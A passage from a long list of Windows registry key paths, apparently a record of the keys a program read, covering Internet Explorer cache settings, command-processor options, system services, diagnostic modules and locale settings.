Settings\5.0\Cache\Extensible Cache\iecompat\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheOptions HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\wlanext.exe HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\* HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ObjectName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19\ProfileImagePath HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\Config\ServerName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\CLResolutionInterval HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\DisplayInterval HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\SkipWatson HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\Settings\ReflectionInterval HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\WerSvcGroup HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName HKEY_USERS\.DEFAULT\Control Panel\International\sCountry HKEY_USERS\.DEFAULT\Control Panel\International\sList HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal HKEY_USERS\.DEFAULT\Control Panel\International\sThousand HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping HKEY_USERS\.DEFAULT\Control Panel\International\sPositiveSign HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime HKEY_USERS\.DEFAULT\Control Panel\International\s1159 HKEY_USERS\.DEFAULT\Control Panel\International\s2359 HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate HKEY_USERS\.DEFAULT\Control Panel\International\iCountry HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize HKEY_USERS\.DEFAULT\Control Panel\International\iDigits HKEY_USERS\.DEFAULT\Control Panel\International\iLZero HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber HKEY_USERS\.DEFAULT\Control Panel\International\NumShape HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Parameters\ServiceDll HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Parameters\ServiceManifest HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Parameters\ServiceMain HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ServiceTimeout HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Parameters\ServiceDllUnloadOnStop HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\NoReflection HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\Windows Error Reporting\NoReflection HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Category HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Name HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\ParentFolder HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Description HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\RelativePath HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\ParsingName 